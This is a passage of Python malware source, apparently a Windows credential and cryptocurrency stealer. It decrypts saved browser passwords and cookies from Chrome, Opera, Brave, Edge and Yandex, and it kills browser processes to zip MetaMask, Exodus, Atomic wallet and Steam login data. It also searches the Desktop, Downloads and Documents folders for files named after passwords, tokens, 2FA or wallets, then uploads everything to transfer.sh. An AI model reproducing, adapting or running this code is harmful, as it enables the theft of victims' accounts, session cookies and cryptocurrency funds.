pathKey = path + "/Local State"
|
||
with open(pathKey, "r", encoding="utf-8") as f:
|
||
local_state = loads(f.read())
|
||
master_key = b64decode(local_state["os_crypt"]["encrypted_key"])
|
||
master_key = CryptUnprotectData(master_key[5:])
|
||
|
||
for row in data:
|
||
if row[0] != "":
|
||
for wa in keyword:
|
||
old = wa
|
||
if "https" in wa:
|
||
tmp = wa
|
||
wa = tmp.split("[")[1].split("]")[0]
|
||
if wa in row[0]:
|
||
if not old in paswWords:
|
||
paswWords.append(old)
|
||
NotPSSW.append(
|
||
f"URL: {row[0]} \n ID: {row[1]} \n PASSW0RD: {Value_Dcryptage(row[2], master_key)}\n\n"
|
||
)
|
||
writeforfile(NotPSSW, "bc_allpasswords")
|
||
|
||
|
||
Cookies = []
|
||
|
||
|
||
def Get_Bc_Cook(path, arg):
|
||
global Cookies
|
||
if not os.path.exists(path):
|
||
return
|
||
pathC = path + arg + "/Cookies"
|
||
if os.stat(pathC).st_size == 0:
|
||
return
|
||
tempfold = (
|
||
temp
|
||
+ "bc_is_here"
|
||
+ "".join(random.choice("bcdefghijklmnopqrstuvwxyz") for i in range(8))
|
||
+ ".db"
|
||
)
|
||
|
||
shutil.copy2(pathC, tempfold)
|
||
conn = connect(tempfold)
|
||
cursor = conn.cursor()
|
||
cursor.execute("SELECT host_key, name, encrypted_value FROM cookies")
|
||
data = cursor.fetchall()
|
||
cursor.close()
|
||
conn.close()
|
||
os.remove(tempfold)
|
||
|
||
pathKey = path + "/Local State"
|
||
|
||
with open(pathKey, "r", encoding="utf-8") as f:
|
||
local_state = loads(f.read())
|
||
master_key = b64decode(local_state["os_crypt"]["encrypted_key"])
|
||
master_key = CryptUnprotectData(master_key[5:])
|
||
|
||
for row in data:
|
||
if row[0] != "":
|
||
for wa in keyword:
|
||
old = wa
|
||
if "https" in wa:
|
||
tmp = wa
|
||
wa = tmp.split("[")[1].split("]")[0]
|
||
if wa in row[0]:
|
||
if not old in cookiWords:
|
||
cookiWords.append(old)
|
||
Cookies.append(
|
||
f"{row[0]} TRUE"
|
||
+ " "
|
||
+ f"/FALSE 2597573456 {row[1]} {Value_Dcryptage(row[2], master_key)}"
|
||
)
|
||
writeforfile(Cookies, "bc_allcookies")
|
||
|
||
|
||
def checkIfProcessRunning(processName):
|
||
"""
|
||
Check if there is any running process that contains the given name processName.
|
||
"""
|
||
# Iterate over the all the running process
|
||
for proc in psutil.process_iter():
|
||
try:
|
||
# Check if process name contains the given name string.
|
||
if processName.lower() in proc.name().lower():
|
||
return True
|
||
except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):
|
||
pass
|
||
return False
|
||
|
||
|
||
def ZipMyThings(path, arg, procc):
|
||
pathC = path
|
||
name = arg
|
||
if "aholpfdialjgjfhomihkjbmgjidlcdno" in arg:
|
||
browser = path.split("\\")[4].split("/")[1].replace(" ", "")
|
||
name = f"Exodus_{browser}"
|
||
pathC = path + arg
|
||
if "nkbihfbeogaeaoehlefnkodbefgpgknn" in arg:
|
||
browser = path.split("\\")[4].split("/")[1].replace(" ", "")
|
||
name = f"Metamask_{browser}"
|
||
pathC = path + arg
|
||
if not os.path.exists(pathC):
|
||
return
|
||
if checkIfProcessRunning("chrome.exe"):
|
||
print("Yes a chrome process was running")
|
||
subprocess.Popen(f"taskkill /im {procc} /t /f", shell=True)
|
||
else:
|
||
...
|
||
if "Wallet" in arg or "NationsGlory" in arg:
|
||
browser = path.split("\\")[4].split("/")[1].replace(" ", "")
|
||
name = f"{browser}"
|
||
elif "Steam" in arg:
|
||
if not os.path.isfile(f"{pathC}/loginusers.vdf"):
|
||
return
|
||
f = open(f"{pathC}/loginusers.vdf", "r+", encoding="utf8")
|
||
data = f.readlines()
|
||
found = False
|
||
for l in data:
|
||
if 'RememberPassword"\t\t"1"' in l:
|
||
found = True
|
||
if found == False:
|
||
return
|
||
name = arg
|
||
zf = zipfile.ZipFile(f"{pathC}/{name}.zip", "w")
|
||
print(zf)
|
||
for file in os.listdir(pathC):
|
||
if not ".zip" in file:
|
||
zf.write(pathC + "/" + file)
|
||
zf.close()
|
||
|
||
upload(f"{pathC}/{name}.zip")
|
||
os.remove(f"{pathC}/{name}.zip")
|
||
|
||
|
||
def bc_Gather_All():
|
||
"Default Path < 0 > ProcesName < 1 > Token < 2 > Password < 3 > Cookies < 4 > Extentions < 5 >"
|
||
browserPaths = [
|
||
[
|
||
f"{roaming}/Opera Software/Opera GX Stable",
|
||
"opera.exe",
|
||
"/Local Storage/leveldb",
|
||
"/",
|
||
"/Network",
|
||
"/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn",
|
||
],
|
||
[
|
||
f"{roaming}/Opera Software/Opera Stable",
|
||
"opera.exe",
|
||
"/Local Storage/leveldb",
|
||
"/",
|
||
"/Network",
|
||
"/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn",
|
||
],
|
||
[
|
||
f"{roaming}/Opera Software/Opera Neon/User Data/Default",
|
||
"opera.exe",
|
||
"/Local Storage/leveldb",
|
||
"/",
|
||
"/Network",
|
||
"/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn",
|
||
],
|
||
[
|
||
f"{local}/Google/Chrome/User Data",
|
||
"chrome.exe",
|
||
"/Default/Local Storage/leveldb",
|
||
"/Default",
|
||
"/Default/Network",
|
||
"/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn",
|
||
],
|
||
[
|
||
f"{local}/Google/Chrome SxS/User Data",
|
||
"chrome.exe",
|
||
"/Default/Local Storage/leveldb",
|
||
"/Default",
|
||
"/Default/Network",
|
||
"/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn",
|
||
],
|
||
[
|
||
f"{local}/BraveSoftware/Brave-Browser/User Data",
|
||
"brave.exe",
|
||
"/Default/Local Storage/leveldb",
|
||
"/Default",
|
||
"/Default/Network",
|
||
"/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn",
|
||
],
|
||
[
|
||
f"{local}/Yandex/YandexBrowser/User Data",
|
||
"yandex.exe",
|
||
"/Default/Local Storage/leveldb",
|
||
"/Default",
|
||
"/Default/Network",
|
||
"/HougaBouga/nkbihfbeogaeaoehlefnkodbefgpgknn",
|
||
],
|
||
[
|
||
f"{local}/Microsoft/Edge/User Data",
|
||
"edge.exe",
|
||
"/Default/Local Storage/leveldb",
|
||
"/Default",
|
||
"/Default/Network",
|
||
"/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn",
|
||
],
|
||
]
|
||
|
||
Paths_zipped = [
|
||
[f"{roaming}/atomic/Local Storage/leveldb", '"Atomic Wallet.exe"', "Wallet"],
|
||
[f"{roaming}/Exodus/exodus.wallet", "Exodus.exe", "Wallet"],
|
||
["C:\Program Files (x86)\Steam\config", "steam.exe", "Steam"],
|
||
[
|
||
f"{roaming}/NationsGlory/Local Storage/leveldb",
|
||
"NationsGlory.exe",
|
||
"NationsGlory",
|
||
],
|
||
]
|
||
|
||
for patt in browserPaths:
|
||
a = threading.Thread(target=Find_Passw, args=[patt[0], patt[3]])
|
||
a.start()
|
||
Threadlist.append(a)
|
||
thread_bccookies = []
|
||
for patt in browserPaths:
|
||
a = threading.Thread(target=Get_Bc_Cook, args=[patt[0], patt[4]])
|
||
a.start()
|
||
thread_bccookies.append(a)
|
||
for thread in thread_bccookies:
|
||
thread.join()
|
||
DETECTED = Trust(Cookies)
|
||
if DETECTED == True:
|
||
return
|
||
for patt in browserPaths:
|
||
threading.Thread(target=ZipMyThings, args=[patt[0], patt[5], patt[1]]).start()
|
||
for patt in Paths_zipped:
|
||
threading.Thread(target=ZipMyThings, args=[patt[0], patt[2], patt[1]]).start()
|
||
for thread in Threadlist:
|
||
thread.join()
|
||
global upths
|
||
upths = []
|
||
|
||
for file in ["bc_allpasswords.txt", "bc_allcookies.txt"]:
|
||
upload(os.getenv("TEMP") + "\\" + file)
|
||
|
||
|
||
def UploadTo_Anon(path):
|
||
try:
|
||
files = {"file": (path, open(path, mode="rb"))}
|
||
...
|
||
upload = requests.post("https://transfer.sh/", files=files)
|
||
url = upload.text
|
||
return url
|
||
except:
|
||
return False
|
||
|
||
|
||
def CreateFolder_(pathF, keywords):
|
||
global bc_create_files
|
||
maxfilesperdir = 7
|
||
i = 0
|
||
listOfFile = os.listdir(pathF)
|
||
ffound = []
|
||
for file in listOfFile:
|
||
if not os.path.isfile(pathF + "/" + file):
|
||
return
|
||
i += 1
|
||
if i <= maxfilesperdir:
|
||
url = UploadTo_Anon(pathF + "/" + file)
|
||
ffound.append([pathF + "/" + file, url])
|
||
else:
|
||
break
|
||
bc_create_files.append(["folder", pathF + "/", ffound])
|
||
|
||
|
||
bc_create_files = []
|
||
|
||
|
||
def bc_create_file(path, keywords):
|
||
global bc_create_files
|
||
fifound = []
|
||
listOfFile = os.listdir(path)
|
||
for file in listOfFile:
|
||
for worf in keywords:
|
||
if worf in file.lower():
|
||
if os.path.isfile(path + "/" + file) and ".txt" in file:
|
||
fifound.append(
|
||
[path + "/" + file, UploadTo_Anon(path + "/" + file)]
|
||
)
|
||
break
|
||
if os.path.isdir(path + "/" + file):
|
||
target = path + "/" + file
|
||
CreateFolder_(target, keywords)
|
||
break
|
||
bc_create_files.append(["folder", path, fifound])
|
||
|
||
|
||
def check_spec_bc():
|
||
user = temp.split("\AppData")[0]
|
||
path2search = [user + "/Desktop", user + "/Downloads", user + "/Documents"]
|
||
|
||
key_wordsFiles = [
|
||
"passw",
|
||
"mdp",
|
||
"motdepasse",
|
||
"mot_de_passe",
|
||
"login",
|
||
"secret",
|
||
"account",
|
||
"acount",
|
||
"paypal",
|
||
"banque",
|
||
"metamask",
|
||
"wallet",
|
||
"crypto",
|
||
"exodus",
|
||
"discord",
|
||
"2fa",
|
||
"code",
|
||
"memo",
|
||
"compte",
|
||
"token",
|
||
"backup",
|
||
"seecret",
|
||
]
|
||
|
||
wikith = []
|
||
for patt in path2search:
|
||
check_spec_bc = threading.Thread(
|
||
target=bc_create_file, args=[patt, key_wordsFiles]
|
||
)
|
||
check_spec_bc.start()
|
||
wikith.append(check_spec_bc)
|
||
return wikith
|
||
|
||
|
||
global keyword, cookiWords, paswWords
|
||
|
||
keyword = [
|
||
"mail",
|
||
"[coinbase](https://coinbase.com)",
|
||
"[sellix](https://sellix.io)",
|
||
"[gmail](https://gmail.com)",
|
||
"[steam](https://steam.com)",
|
||
"[discord](https://discord.com)",
|
||
"[riotgames](https://riotgames.com)",
|
||
"[youtube](https://youtube.com)",
|
||
"[instagram](https://instagram.com)",
|
||
"[tiktok](https://tiktok.com)",
|
||
"[twitter](https://twitter.com)",
|
||
"[facebook](https://facebook.com)",
|
||
"card",
|
||
"[epicgames](https://epicgames.com)",
|
||
"[spotify](https://spotify.com)",
|
||
"[yahoo](https://yahoo.com)",
|
||
"[roblox](https://roblox.com)",
|
||
"[twitch](https://twitch.com)",
|
||
"[minecraft](https://minecraft.net)",
|
||
"bank",
|
||
"[paypal](https://paypal.com)",
|
||
"[origin](https://origin.com)",
|
||
"[amazon](https://amazon.com)",
|
||
"[ebay](https://ebay.com)",
|
||
"[aliexpress](https://aliexpress.com)",
|
||
"[playstation](https://playstation.com)",
|
||
"[hbo](https://hbo.com)",
|
||
"[xbox](https://xbox.com)",
|
||
"buy",
|
||
"sell",
|
||
"[binance](https://binance.com)",
|
||
"[hotmail](https://hotmail.com)",
|
||
"[outlook](https://outlook.com)",
|
||
"[crunchyroll](https://crunchyroll.com)",
|
||
"[telegram](https://telegram.com)",
|
||
"[pornhub](https://pornhub.com)",
|
||
"[disney](https://disney.com)",
|
||
"[expressvpn](https://expressvpn.com)",
|
||
"crypto",
|
||
"[uber](https://uber.com)",
|
||
"[netflix](https://netflix.com)",
|
||
]
|
||
|
||
|
||
cookiWords = []
|
||
paswWords = []
|
||
|
||
bc_Gather_All()
|
||
DETECTED = Trust(Cookies)
|
||
|
||
if not DETECTED:
|
||
wikith = check_spec_bc()
|
||
|
||
for thread in wikith:
|
||
thread.join()
|
||
time.sleep(0.2)
|
||
|
||
filetext = "```diff\n"
|
||
for arg in bc_create_files:
|
||
if len(arg[2]) != 0:
|
||
foldpath = arg[1]
|
||
foldlist = arg[2]
|
||
filetext += f"\n"
|
||
filetext += f"- {foldpath}\n"
|
||
|
||
for ffil in foldlist:
|
||
a = ffil[0].split("/")
|
||
fileanme = a[len(a) - 1]
|
||
b = ffil[1]
|
||
filetext += f"+ Name: {fileanme}\n+ Link: {b}"
|
||
filetext += "\n"
|
||
filetext += "\n```"
|
||
|
||
upload("check_spec_bc", filetext)
|
||
auto = threading.Thread(target=auto_copy_wallet().run)
|
||
auto.start()
|